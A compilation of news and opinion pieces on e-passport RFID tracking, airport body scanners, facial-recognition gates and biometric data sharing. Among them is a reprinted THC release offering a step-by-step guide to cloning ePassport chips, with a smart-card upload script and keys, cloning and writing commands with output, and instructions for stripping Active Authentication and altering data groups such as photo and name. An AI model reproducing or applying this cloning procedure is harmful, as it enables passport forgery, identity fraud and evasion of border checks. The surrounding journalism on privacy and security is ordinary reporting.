This threat brought to you by RFID

By Dan Goodin in San Francisco • The Register

Computer scientists in Britain have uncovered weaknesses in electronic passports issued by the US, UK, and some 50 other countries that allow attackers to trace the movements of individuals as they enter or exit buildings.

The so-called traceability attack is not the only exploit of an e-passport that allows attackers to remotely track a given credential in real time without first knowing the cryptographic keys that protect it, the scientists from University of Birmingham said. What’s more, RFID, or radio-frequency identification, data in the passports can’t be turned off, making the threat persistent unless the holder shields the government-mandated identity document in a special pouch.

“A traceability attack does not lead to the compromise of all data on the tag, but it does pose a very real threat to the privacy of anyone that carries such a device,” the authors, Tom Chothia and Vitaliy Smirnov, wrote. “Assuming that the target carried their passport on them, an attacker could place a device in a doorway that would detect when the target entered or left a building.”

To exploit the weakness, attackers would need to observe the targeted passport as it interacted with an authorized RFID reader at a border crossing or other official location. They could then build a special device that detects the credential each time it comes into range. The scientists estimated the device could have a reach of about 20 inches.

“This would make it easy to eavesdrop on the required message from someone as they used their passport at, for instance, a customs post,” the authors wrote.

The attack works by recording the unique message sent between a particular passport and an official RFID reader and later replaying it within range of the special device. By measuring the time it takes the device to respond, attackers can determine whether the targeted passport is within range. In the case of e-passports from France, the process is even easier: electronic credentials from that country will return the error message “6A80: Incorrect parameters” if the targeted person is in range and “6300: no information given” if the person is not.

The research is only the latest to identify the risks of embedding RFID tags into passports and other identification documents. Last year, information-security expert Chris Paget demonstrated a low-cost mobile platform that surreptitiously sniffs the unique digital identifiers in US passport cards and next-generation drivers licenses. Among other things, civil liberties advocates have warned that those identifiers could be recorded at political demonstrations or other gatherings so police or private citizens could later determine whether a given individual attended.

To be sure, the practicality of traceability attacks is more limited because a targeted passport first must be observed within range of a legitimate reader. But once this hurdle is cleared – as would be relatively easy for unscrupulous government bureaucrats to do – the attack becomes a viable way to track a target.

Chothia and Smirnov of the University of Birmingham’s School of Computer Science said the security hole can be closed by standardizing error messages and “padding” response times in future e-passports. But that will do nothing to protect holders of more than 30 million passports from more than 50 countries who are vulnerable now, they said.

And that’s sure to fuel criticism of RFID-enabled identification.

“This is a great example of why e-passports are a bad idea,” Paget wrote in an email to The Register. “It’s simply too expensive to replace vulnerable documents (especially when they have a 10-year lifespan) in response to legitimate security concerns, regardless of their severity. People will continue to poke holes in e-passports; without a mechanism to fix those problems there’s a strong argument that’s we’re better off without the RFID.”

Should our body be considered a form of property to government?

Biometrics and Security should enhance rather than conflict with individual privacy and dignity. As stated by the philosopher Immanuel Kant (1724-1804): “Human beings should never be treated as merely means to an end” – Namely, ‘Human beings are already the purpose, they must not be sacrificed to fulfill other purposes’.

By: JILL SCHENSUL – TRAVEL COLUMNIST

E-mail: schensul@northjersey.com

OK, let’s calm down for a second. I think it’s time to put this issue on whole body scanning — aka “TSA porn” — in perspective.

Yes, these scanners can put together a good idea of what’s underneath our traveling clothes. That’s the point, after all, when looking for concealed weapons. But some privacy groups, passengers and elected officials watching out for our modesty think the results are a little too creepily lifelike. As Rep. Jason Chaffetz, R-Utah, coiner of the TSA porn epithet, said: “Nobody needs to see my wife and kids naked to secure an airplane.”

The scans don’t exactly look like naked people. More like naked … avatars.

The TSA also says the machines have a program that blurs faces/identities. And they point out, on the Web page of information about the machines, that the scanner “does not store, print, transmit or save the image. All machines have zero storage capability and all images are automatically deleted from the system after they are reviewed by the remotely located security officer.” It’s not like you’ll be seeing yourself on some scangallery.com site in the future, or finding your head cloned onto some X-rated body.

Probably not, anyway.

An Internet watchdog group, the Electronic Privacy Information Center [EPIC], has obtained documents from the Department of Homeland Security suggesting that the TSA wasn’t being transparent about what the machines can do; apparently, there’s a “test mode” that does allow for data storage and the export of images. Only employees with high-level clearance can access this particular mode, though, and certainly those folks are too busy poring over lists of terrorists and the like to be unleashing such unflattering images upon cyberspace.

‘Virtual strip search’

No matter what their ultimate fate, even subjecting travelers to these scans is an egregious invasion of privacy — tantamount, according to the American Civil Liberties Union, to a “virtual strip search.”

Hello? When was the last time these protesters went through a security check?

Invasion of privacy is what it’s all about. A veritable humiliation, violation marathon, from shoe removal to pocket-emptying, from undoing belts to declaring underwire bras, from swabbing our laptops to disassembling our carry-ons and pawing through purses. And the ultimate de-privatization – usually reserved for the beep-producers – is to be ordered into wanding position, to stand in that Leonardo DaVinci arms-and-legs-spread mode and be subjected to hand scanning and hand-goosings that somehow seem to suck all the freedom out of your soul.

All done before an audience of your peers. Who get to watch the belts come off and the beer bellies bared and the plumber-butts revealed as the beltless pants begin sagging. All in all, I’ll take the scanner.

The more worrisome aspect of these new machines, to me, is the radiation issue. I just keep thinking of those rolls of fogged film I’d get back from the labs every so often. The long strip of nothing but eerie billows of gray, the fallout of overradiation.

So when the TSA tells us the new scanners’ X-rays are harmless, I think about the little sign they used to have at the security screening area, way back when, that assured us X-rays would not harm film up to 400 ASA. And I think about all that gray.

The TSA already has 40 whole body scanners at airports around the country, and, since the recent close call on Northwest Airlines Flight 253, has decided to buy and deploy nearly 450 more.

There are actually two types of scanners being tested. Experts in the field of radiation seem in agreement that millimeter wave technology, which uses radio frequency energy for scanning, is harmless.

Opinions vary on the safety of the backscatter machines, which use low-level X-rays. The dose of radiation is small – about 0.1 microrem of radiation, compared with 100 microrem for a chest X-ray or 10,000 microrem for a CT scan.

According to TSA officials, backscatter machines produce a clearer image.

Radiation danger?

In an article on the American College of Radiology’s Web site, Mayo Clinic neuroradiologist Peter Kalina questions the use of even small doses of ionizing radiation in non-medical applications. “The amount of radiation may be extremely small and safe, but parents have to grasp that their 4-year-old child is being subjected to radiation. Some parents will be concerned,” he says.

David J. Brenner, a Columbia University professor of radiation oncology and public health, worries about subjecting pregnant women to the scans, too. He also says that about 5 percent of the general population is radiosensitive, among them women who carry certain breast cancer genes.

The TSA says these scans will be voluntary – you can opt for the pat-down if you want.

Kalina is concerned about a potential scenario in which a less-developed nation might adopt backscatter scanning technology, but fail to keep its scanners calibrated. “As a traveler,” he has said, “I don’t know who’s checked that machine or equipment. Can I be sure there won’t be a larger dose of radiation coming from it?” I believe he said this before the recent discovery that 206 patients at Cedars-Sinai Medical Center in Los Angeles received eight times the normal dose of radiation from a CT scan machine with a computer-resetting error.

Risk-benefit analysis

But all these debates are secondary to the real question: Are the benefits worth the risks, hassle, humiliation and expense?

The new scanners might do a better job than the current technology but obviously have their drawbacks, and opinions vary on whether they can reliably detect weapons hidden in body cavities. And they’re simply an option – not even a terrorist can be forced into one.

The scanners are a good straw to grasp at after the latest high-profile oops in the security system was brought to light.

The problem is, every new measure is simply a reaction to the latest near-miss, a Band-Aid rather than a real systemic change for the better. Various tech companies that make the equipment will certainly benefit in the short term, but will the cost and the risks really benefit the war on terrorism and make us safer?

I’m with Bruce Schneier, an internationally recognized security technologist who said that while whole-body-imaging technology “works pretty well,” the financial investment is a mistake. He believes money would be better spent on intelligence-gathering and investigations.

“It’s stupid to spend money so terrorists can change plans,” he said by phone from Poland, where he was speaking at a conference. If terrorists are swayed from going through airports, they’ll just target other locations, such as a hotel in Mumbai, India, he said.

But the orders are already in for another 100 of these machines. So, well, we’ll deal with it. I’m going to opt for the whole scan thing, especially if I don’t have to take off my shoes. And the new option should at least cut down on the incidence of plumber butt.

But technology is just one link in the security system.

And as the recent incident shows, no matter how much intelligence we gather, no matter how many alert systems we put in place, they’re useless if ignored.

By Duncan Gardham, Security Correspondent

Osama bin Laden and Winona Ryder: airport face scanners reportedly cannot tell the difference Photo: GETTY; EPA

In a leaked memo, an official says the machines have been recalibrated to an “unacceptable” level meaning travellers whose faces are shown to have only a 30% (Thirty per cent) likeness to their passport photographs can pass through.

The machines, undergoing trials at Manchester airport, have apparently been questioning so many passengers’ identities that they were creating huge queues.

The technology was designed to help immigration officials spot people traveling under false passports, particularly terrorists, but the multi-million pound scheme now appears to be in jeopardy.

In the email, the official says: “Update on the calibration – the facial recognition booths are letting passengers through at 30%.

“Changes appear to have been made without any explanation [or] giving anyone a reason for the machines [creating] what is in effect a 70% error rate.

“[The fact that] the machines do not operate at 100% is unacceptable. In addition it would be interesting to know why the acceptance level has been allowed to decrease.”

Rob Jenkins, an expert in facial recognition at Glasgow University’s psychology department, said lowering the match level to 30 per cent would make the system almost worthless.

Using facial recognition software from Sydney airport in Australia set at 30 per cent, he found the machines could not tell the difference between Osama bin Laden and the actors Kevin Spacey or even the actress Winona Ryder while Gordon Brown was indistinguishable from Mel Gibson.

Announcing a trial of five of the devices at Manchester airport last August, Jacqui Smith, the Home Secretary, said they would improve security by making it more difficult for terrorists using false passports.

At the moment the technology is only being used on British and European travelers on “high risk” flights but it is planned to extend the technology to almost all non-European Union citizens by the end of 2010.

Patrick Mercer, chairman of the House of Commons subcommittee on counter-terrorism, said he would be asking the UK Borders agency about the warnings.

The Home Office said: “We can categorically confirm that the gates are making the same high level of checks on the British and European passengers using them as they were when the trials began in August last year.

“Previous tests show that they system can reliably pick out imposters and even distinguish between identical twins. An immigration officer supervises the whole process and will intervene where necessary.”

http://www.thestar.com/news/world/article/744199—israelification-high-security-little-bother
The ‘Israelification’ of airports: High security, little bother
Cathal Kelly Staff Reporter 

Voyeurism Security

While North America’s airports groan under the weight of another sea-change in security protocols, one word keeps popping out of the mouths of experts: Israelification.

That is, how can we make our airports more like Israel’s, which deal with far greater terror threat with far less inconvenience.

“It is mindboggling for us Israelis to look at what happens in North America, because we went through this 50 years ago,” said Rafi Sela, the president of AR Challenges, a global transportation security consultancy. He’s worked with the RCMP, the U.S. Navy Seals and airports around the world.

“Israelis, unlike Canadians and Americans, don’t take s— from anybody. When the security agency in Israel (the ISA) started to tighten security and we had to wait in line for — not for hours — but 30 or 40 minutes, all hell broke loose here. We said, ‘We’re not going to do this. You’re going to find a way that will take care of security without touching the efficiency of the airport.”

That, in a nutshell is “Israelification” – a system that protects life and limb without annoying you to death. 
Despite facing dozens of potential threats each day, the security set-up at Israel’s largest hub, Tel Aviv’s Ben Gurion Airport, has not been breached since 2002, when a passenger mistakenly carried a handgun onto a flight. How do they manage that?

“The first thing you do is to look at who is coming into your airport,” said Sela.

The first layer of actual security that greets travellers at Tel Aviv’s Ben Gurion International Airport is a roadside check. All drivers are stopped and asked two questions: How are you? Where are you coming from?

“Two benign questions. The questions aren’t important. The way people act when they answer them is,” Sela said.

Officers are looking for nervousness or other signs of “distress” — behavioural profiling. Sela rejects the argument that profiling is discriminatory.

“The word ‘profiling’ is a political invention by people who don’t want to do security,” he said. “To us, it doesn’t matter if he’s black, white, young or old. It’s just his behaviour. So what kind of privacy am I really stepping on when I’m doing this?”

Once you’ve parked your car or gotten off your bus, you pass through the second and third security perimeters.
Armed guards outside the terminal are trained to observe passengers as they move toward the doors, again looking for odd behaviour. At Ben Gurion’s half-dozen entrances, another layer of security are watching. At this point, some travellers will be randomly taken aside, and their person and their luggage run through a magnometer.

“This is to see that you don’t have heavy metals on you or something that looks suspicious,” said Sela.
You are now in the terminal. As you approach your airline check-in desk, a trained interviewer takes your passport and ticket. They ask a series of questions: Who packed your luggage? Has it left your side?

“The whole time, they are looking into your eyes — which is very embarrassing. But this is one of the ways they figure out if you are suspicious or not. It takes 20, 25 seconds,” said Sela.

Lines are staggered. People are not allowed to bunch up into inviting targets for a bomber who has gotten this far.

At the check-in desk, your luggage is scanned immediately in a purpose-built area. Sela plays devil’s advocate — what if you have escaped the attention of the first four layers of security, and now try to pass a bag with a bomb in it?

“I once put this question to Jacques Duchesneau (the former head of the Canadian Air Transport Security Authority): say there is a bag with play-doh in it and two pens stuck in the play-doh. That is ‘Bombs 101′ to a screener.. I asked Ducheneau, ‘What would you do?’ And he said, ‘Evacuate the terminal.’ And I said, ‘Oh. My. God.’

“Take Pearson. Do you know how many people are in the terminal at all times? Many thousands. Let’s say I’m (doing an evacuation) without panic — which will never happen. But let’s say this is the case. How long will it take? Nobody thought about it. I said, ‘Two days.’”

A screener at Ben-Gurion has a pair of better options.
First, the screening area is surrounded by contoured, blast-proof glass that can contain the detonation of up to 100 kilos of plastic explosive. Only the few dozen people within the screening area need be removed, and only to a point a few metres away.

Second, all the screening areas contain ‘bomb boxes’. If a screener spots a suspect bag, he/she is trained to pick it up and place it in the box, which is blast proof. A bomb squad arrives shortly and wheels the box away for further investigation.

“This is a very small simple example of how we can simply stop a problem that would cripple one of your airports,” Sela said.

Five security layers down: you now finally arrive at the only one which Ben-Gurion Airport shares with Pearson — the body and hand-luggage check.

“But here it is done completely, absolutely 180 degrees differently than it is done in North America,” Sela said.
“First, it’s fast — there’s almost no line. That’s because they’re not looking for liquids, they’re not looking at your shoes. They’re not looking for everything they look for in North America. They just look at you,” said Sela. 

“Even today with the heightened security in North America, they will check your items to death. But they will never look at you, at how you behave. They will never look into your eyes … and that’s how you figure out the bad guys from the good guys.”

That’s the process — six layers, four hard, two soft. The goal at Ben-Gurion is to move fliers from the parking lot to the airport lounge in a maximum of 25 minutes.
This doesn’t begin to cover the off-site security net that failed so spectacularly in targeting would-be Flight 253 bomber Umar Farouk Abdulmutallab — intelligence. In Israel, Sela said, a coordinated intelligence gathering operation produces a constantly evolving series of threat analyses and vulnerability studies. 

“There is absolutely no intelligence and threat analysis done in Canada or the United States,” Sela said. “Absolutely none.”

But even without the intelligence, Sela maintains, Abdulmutallab would not have gotten past Ben Gurion Airport’s behavioural profilers.

So. Eight years after 9/11, why are we still so reactive, so un-Israelified?

Working hard to dampen his outrage, Sela first blames our leaders, and then ourselves.

“We have a saying in Hebrew that it’s much easier to look for a lost key under the light, than to look for the key where you actually lost it, because it’s dark over there. That’s exactly how (North American airport security officials) act,” Sela said. “You can easily do what we do. You don’t have to replace anything. You have to add just a little bit — technology, training.. But you have to completely change the way you go about doing airport security. And that is something that the bureaucrats have a problem with. They are very well enclosed in their own concept.”

And rather than fear, he suggests that outrage would be a far more powerful spur to provoking that change.
“Do you know why Israelis are so calm ? We have brutal terror attacks on our civilians and still, life in Israel is pretty good. The reason is that people trust their defence forces, their police, their response teams and the security agencies.

They know they’re doing a good job. You can’t say the same thing about Americans and Canadians. They don’t trust anybody,” Sela said. “But they say,… ‘ So far, so good…’ Then if something happens, all hell breaks loose and you’ve spent eight hours in an airport. Which is ridiculous. Not justifiable

“But, what can you do? Americans and Canadians are nice people and they will do anything because they were told to do so and because they don’t know any different.”

BY HENRICK KAROLISZYN AND SAMUEL GOLDSMITH
DAILY NEWS WRITERS

Originally Published:Sunday, December 27th 2009, 11:11 PM
Updated: Tuesday, December 29th 2009, 1:25 PM

Some fliers say whole body scanners, which cost about $150,000 apiece, are no more invasive than a security patdown procedure.

Some fliers say whole body scanners, which cost about $150,000 apiece, are no more invasive than a security patdown procedure.

Read more:

http://www.nydailynews.com/news/national/2009/12/28/2009-12-28_fliers_favor_naked_truth_in_airport_body_scanners.html#ixzz0bZ4ftN3K

Bring on the body scans!

Beleaguered airline passengers said Sunday they have no problem with controversial new “whole body scan” machines that give screeners an undressed view of travelers.

The technology is in use at a handful of U.S. airports, including Salt Lake City and Los Angeles International, and is still being tested by the Transportation Security Administration.

“I don’t mind [the scanner] because it would be in place for safety,” said Samantha Day, 44, who flew into Kennedy Airport from London.

“It’s no more invasive than someone touching every part of your body” during existing patdown security procedures, added Marni Blitz of Robbinsville, N.J.

Opponents argue the machines violate personal privacy because they show images of the naked body. Advocates counter that they’re vital to safety – and would have detected the explosives sewn into the underwear of a Nigerian man who tried to blow up a flight over Detroit on Christmas Day.

The body imaging machines cost about $150,000. They emit some radiation, but experts say it’s far less than what passengers are exposed to on a normal flight.

Former Homeland Security chief Michael Chertoff told the Daily News that naysayers have delayed installation of the scanners.

He said the botched attack on Flight 253 shows that they are a needed weapon in the anti-terror arsenal.

“Privacy advocates and the ACLU have slowed or stopped the deployment of the machines with a barrage of objections,” Chertoff said in an e-mail. “The bad guys have figured out this vulnerability. Isn’t it time we deployed these machines?”

Read more:

http://www.nydailynews.com/news/national/2009/12/28/2009-12-28_fliers_favor_naked_truth_in_airport_body_scanners.html#ixzz0bZ4vfGUI

Letter

Executive Committee Home

BEAT THE CHIP

BEATTHECHIP.ORG IS DEVOTED TO PRESERVING US CITIZENS FROM THE PROGRESS OF REAL ID LEGISLATIONS

WEDNESDAY, NOVEMBER 25, 2009

c/o CanWest News Washington
WASHINGTON — Seeking to enhance its efforts to crack down on fraudulent refugee claims, the Harper government on Tuesday announced it has struck a deal to share fingerprint information on asylum seekers with the United States.

Public Safety Minister Peter Van Loan made the announcement following a bilateral summit here with U.S. Homeland Security Secretary Janet Napolitano.

Under the protocol, the U.S. will join a biometric data-sharing initiative Canada had already launched last summer with the United Kingdom and Australia.

“Biometrics continue to be a powerful tool to prevent terrorists and criminals from crossing our shared border and preventing identity theft and asylum fraud,” Napolitano said at a news conference with Van Loan.

Canada’s privacy commissioner, Jennifer Stoddart, had expressed a series of concerns about the biometric data sharing when the plan was first announced in August. Stoddart’s office questioned Ottawa about the need to collect fingerprints and sought assurances the personal information gathered would not be used for secondary purposes.

“While we are still reviewing their response, on the surface of it, it appears they have addressed most of our concerns,” said Anne-Marie Hayden, a spokesperson for the privacy commissioner.

“They have advised us that under the protocol, biometric information will only be used for immigration and nationality issues. They have also told us that biometric matching information will only be one of many elements considered when assessing a file.”

The privacy commissioner’s office is still awaiting a response, however, on how Citizenship and Immigration Canada “plans to address our concerns about how refugees, a very vulnerable population, will be notified about the collection and use of their biometric information,” Hayden said.

Napolitano said the U.S. will dispatch its chief privacy officer to Ottawa in early December for discussions with Canadian officials. “As we share information, we are committed to protecting privacy and civil rights,” she said.

Immigration Minister Jason Kenney has argued biometric data sharing on refugee claimants dramatically increases the government’s ability to identify foreign nationals who try to hide their past when seeking to enter Canada.
His office says the agreement allows countries to check each other’s fingerprint databases but doesn’t give them unfettered access to the information.

“Previous trials show that biometric information sharing works,” Kenney said in a statement Tuesday. “The data sharing helps uncover details about refugee claimants such as identity, nationality, criminality, travel and immigration history, all of which can prove relevant to the claim.”

When Canada, the U.K. and Australia initially signed the agreement last summer, they sought to allay privacy concerns by agreeing no central database of fingerprints would be created.

The information-sharing pact is part of a broader government initiative to introduce biometrics into Canada’s immigration and refugee screening system — a plan that continues to raise red flags for privacy advocates.

“We have made them aware of our concerns with respect to what seems to be a general trend toward an increased collection of biometric information,” Hayden said.

THC/vonJeek proudly presents an ePassport emulator. This emulator applet
allows you to create a backup of your own passport chip(s).


The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make usemore secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.

Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

 * EF.COM :    32 bytes (required file)
 * EF.SOD :  2560 bytes (required file)
 * EF.DG1 :    96 bytes (required file)
 * EF.DG2 : 24576 bytes (required file)
 * EF.DG11:    64 bytes (optional, e.g. USA)
 * EF.DG12:    96 bytes (optional, e.g. USA)
 * EF.DG13:    96 bytes (optional, e.g. Japan, France)
 * EF.DG15:   192 bytes (optional, e.g. The Netherlands)

If you need support for other / larger DGs, please let vonJeek know.

(2a) Clone the chip
Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able
to read a chip's content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.

Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This
attack will work on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.

(2b) Write saved data
It's also possible to write chip data you've saved earlier using RFIDIOt's
mrpkey.py. As an example you can use vonJeek's ePassport data. Note that
this data is self-signed: vonJeek started his own country 

P:\tmp>unzip vonjeek-epassport_dump.zip
Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN 

P:\>cd \RFIDIOt-vonjeek 

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek ;lt;mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about - amongst others - DG1 and
DG2 encoding. If you've updated the DGs you can sign them using Peter
Gutmann's CryptLib. 

A read-out of vonJeek's ePassport chip using the reference implementation
named Golden Reader Tool can be seen below.

If you're interested in ePassport related PKI (how to verify whether chip
content is signed by a bonafide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece 

Yours sincerly,

vonjeek [at] thc dot org
The Hackers Choice

http://www.thc.org

By Tom Espiner ZDNet.co.uk

Posted on ZDNet News

Security expert and BT chief security-technology officer Bruce Schneier has attacked the US-Visit border-biometrics program, saying it has had “zero benefit” in terms of security.

Speaking to ZDNet UK last week, Schneier said that there was little evidence that the US-Visit program, which takes fingerprints and retinal scans from all visitors to the United States, had made any impact on reducing the threat from criminals and terrorists.

“If the Department of Homeland Security had apprehended any terrorists [through US-Visit], they would have kicked up a huge press stink,” said Schneier. “There has been zero benefit from the program.”

A long-time critic of the US-Visit program, Schneier first questioned the cost-effectiveness of the scheme in 2006. At the time, just under 1,000 people had been apprehended for criminal or immigration violations, yet the program had cost $15 billion (£9.4bn) up to that point.

“Take that $15 billion number,” wrote Schneier in a 2006 blog post. “One thousand bad guys, most of them not very bad, caught through US-Visit. That’s $15 million per bad guy caught. Surely there’s a more cost-effective way to catch bad guys?”

However, Robert Jamison, undersecretary at the US Department of Homeland Security’s National Protection and Programs Directorate, which oversees US-Visit, told ZDNet UK at the RSA Conference Europe 2008 on Wednesday that the border-biometrics program had been effective.

“There have been several instances of someone applying for entry under one name, being denied, applying under another name, and again being denied [due to biometrics records],” said Jamison. “In a few cases, criminal activity and, in some cases, terrorist activity have been prevented.”

Jamison declined to say exactly how many terrorists had been caught as a direct result of the program, saying the information was “classified”. However, Department of Homeland Security figures show that more than 2,400 immigration “violators” and criminals have been identified since the inception of the program in January 2004.

In February, US-Visit was claimed to have helped identify two terrorist suspects, now being held in Iraq, from fingerprints lifted from an improvised explosive device.